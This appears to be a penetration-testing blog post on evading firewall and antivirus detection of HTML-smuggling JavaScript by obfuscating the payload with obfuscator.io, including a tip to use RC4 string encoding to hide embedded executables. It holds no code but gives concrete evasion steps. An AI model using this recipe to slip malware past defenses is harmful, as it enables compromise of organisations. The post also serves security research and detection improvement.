Ethical NoticeThis information is provided exclusively for the purposes of legitimate penetration testing, education, and further security research. The only way to improve security is by testing it. It's only once we acknowledge a problem (e.g. in a security solution) that we can take steps towards fixing it. Being aware of a potential false sense of security is equally important.
In today's short article, we will be covering how to make any JavaScript payload fully undetectable!
This simple technique works great, even a little too well, for evading detection of any offensive security tool that outputs JavaScript.
Perfect use case: HTML Smuggling๐
File introspection with the goal of blocking/detecting EXEs, scripts, and other downloads is a common feature of next-generation firewalls (NGFW) prevalently deployed by enterprises. To get around this security measure, attackers commonly deploy a technique known as HTML smuggling. It works by hiding a malicious file in JavaScript which is downloaded by the target and then decoded into the final payload. As usual, the target will simply see a file is being downloaded and will be none the wiser to the sneaky way in which we delivered it!
Image courtesy Microsoft Threat Intelligence.
Email attachments from sources external to an organization are often stripped. Hence why a website, with a link in the email, is usually used to deliver a payload in the first place. Most large email providers like Gmail or Outlook also always strip attachments with troubling extensions.
Naturally, defenders created signatures for these HTML smuggling JavaScript tools so they could be detected over the network (as opposed to the final payloads themselves):
Above are the detections of one such HTML smuggling project: EmbedInHTML. In practice, a NGFW's detection for this type of payload would be much higher. The antiviruses on VirusTotal aren't as geared towards detecting this type of threat. Even still, we have lots of unwanted detections.
Flying under the radar...๐
So, the defenders made a move. Now it's the attacker's turn: How might an attacker become fully undetectable (at least... for now)?
Simple, just paste your payload into obfuscator.io then click the "Obfuscate" button!
Pro tip: If you're HTML smuggling a binary file (like an EXE or DLL) then definitely make sure to select the RC4 encryption option under String Array Encoding. This is necessary to remove any last bits of data that NGFWs might use to signal on. Detecting the structure of any executable file (with its MZ magic number and other PE/COFF structures) within JavaScript is a very strong heuristic and NGFWs will not like it if they see that...
One might think that obfuscating JavaScript in this way would be a huge red flag to NGFWs and other detection software. This would be true in almost any other case like with extensive PowerShell obfuscation or packers for binaries (e.g. antiviruses tend to hate the UPX packer). However, in the world of JavaScript it's very normal to see heavily minified and sometimes obfuscated scripts to keep file sizes as low as possible for the web and possibly to protect proprietary code. This makes blending in with the vast quantities of those already existing legitimate scripts a very successful strategy.
Response (UPDATE)๐
Florian Roth (@cyb3rops), a well-known detection engineer in the security space, acknowledged this hole in detection two days after this post went live.
Okay, I just checked and so far we have postet 96,387,836 comments on @Virustotal
โ Florian Roth (@cyb3rops) August 17, 2023
( and we have deactivated some very good but very noisy rules, e.g. for JavaScript obfuscation, which would have triggered on this sample https://t.co/3niDn2OQLf ) pic.twitter.com/3eos9Gyv1a
A few years ago, when I first came across this method for evading detection, the original output from obfuscator.io did indeed get caught by VirusTotal. However, after applying my "pro tip" the sample was fully undetected.
Trying this method out again today, I wondered why my sample was fully undetected by VirusTotal even without my "pro tip". After all, detection is supposed to get better over time, not worse! I'm glad to have this question answered now.
It's my hope that Florian Roth and other engineers can improve the state of JavaScript detection to better protect organizations from compromise.
InfoDetection software (such as antivirus, endpoint detection and response, and next-generation firewalls) should only be used as part of a more holisitc defense-in-depth security strategy. This is primarily because security through detection is a cat-and-mouse game. If 'real' security is what you want then have a look at my binary exploitation or Qubes OS content (upcoming).
